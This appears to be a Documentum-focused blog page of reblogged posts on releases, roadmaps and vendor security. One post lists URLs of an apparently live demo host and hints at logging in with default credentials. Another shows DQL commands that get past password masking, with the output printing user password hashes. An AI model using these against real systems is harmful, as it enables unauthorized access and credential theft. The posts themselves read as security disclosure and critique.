OTEW 2018 fun

LOL :)))))

Alvaro de Andres' Blog

I’m not attending the event being held in Toronto, but I found through twitter this nice url:

http://hol-host05.eastus.cloudapp.azure.com:81/d2-unity-web/ui/app.html -> This is the new D2 UI (and yes, you can use the you-know-which-default-user(s) to log in and check it by yourself) deployed on Azure (which is weird, considering Opentext has its own cloud…)

But, the really funny thing here, are these urls:

http://hol-host05.eastus.cloudapp.azure.com:81/da -> da 7.3 (but with CS 16.4/SQL Server)

http://hol-host05.eastus.cloudapp.azure.com:81/D2 -> hello old D2 vulnerabilities 🙂

http://hol-host05.eastus.cloudapp.azure.com:81/d2-unity-web/repositories -> and you can log in with you-know-which-default-user(s), and you have a nice DQL tool provided by REST services 🙂

View original post

Opentext Documentum Server 16.4 released

Who the hell creates database indexes through DQL? Please, show me that idiot.

Alvaro de Andres' Blog

You can find it in the downloads section.

New features:

  • Independent JMS
  • OpenText Directory Services integration with Documentum
  • Support for parallel indexing
  • Support for Amazon S3 store
  • Audit Trail enhancements
  • Support for + (concat) operator in Oracle databases
  • Removal of sticky bit

View original post

Software company vs Apache License

Pro Documentum

A month ago I got impressed how software company manages knowledge: as all we know when Documentum was under EMC wing there were two public forums: Documentum Support Forum and Documentum Developer Forum – both are inaccessible for now because OpenText had partially moved their content to OpenText community forum and restricted access to customers only – here I have now idea why do they think that ECN forums weren’t public:

At ECD, the two forums you mentioned were separated because one was an open forum and the other (Dev) was closed and available to developers only. Here, we do not have the distinction of open and closed forums within our product membership.

Today I got another interesting case: it seems that OpenText decided to rebrand Documentum products but doing it in extremely weird manner, for example:

View original post

Opentext Documentum is coming next month

Alvaro de Andres' Blog

I didn’t realize that roadmap documents were updated last month. It looks like the February release is still going to happen (and I’ve been told a definite date, so it looks it won’t be delayed). After reviewing them (haven’t seen any changes :D), I can say:

  • Not much features regarding CS, the pattern/usage visualization and the s3 support (which, as far as I know, can be already done without official support) are the new features.
  • No word about DFS, and I know for a fact that several customers have actively asked for updates to current libs and extended support for application servers.
  • Clients get barely any changes (D2, Webtop, xCP).

I’m curious to see how many bugs are found in this first release from Opentext (and the brave customers that go first into the unknown :D), considering that some of the experienced Documentum staff left the company and the changes…

View original post 19 more words

Eradication of Illiteracy

What talented team had defined as “the information to retrieve” has a special name: projection, and, for most relational databases, names of attributes, presented in projection, are case-insensitive.

It seems that some members of talented team think that they are smart enough to read this blog and make some conclusions about security:

API> ?,c,select user_password from dm_user where user_name=USER
user_password   
----------------
****************
(1 row affected)

API> ?,c,select * from (select user_password from dm_user where user_name=USER)
user_password   
----------------
****************
(1 row affected)

But all their attempts are doomed to failure:

API> ?,c,select USER_PASSWORD from dm_user where user_name=USER
user_password
-----------------------------------------------------------------------
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nG ...

API> readquery,c,select * from (select * from dm_user where user_name=USER)
...
q0
API> next,c,q0
...
OK
API> get,c,q0,user_password
...
AAAAEAjkr5it6wBqYfLetO/ob9j+75axyTIlb6WpnS8vLcP58ppmenSigXCm4pT1Q3nGK ...

Q & A. XVI

I will work, maybe, in a D2 implementation project that could be released in a public site. I do not have updated information regarding D2 4.7 security holes: I need an independent point of view and you are probably the only person that has a clear understanding of what I am talking. Can you help me to understand what has not yet been fixed just in the D2 layer?

Current D2 security status: any authenticated user may gain superuser privileges 🙂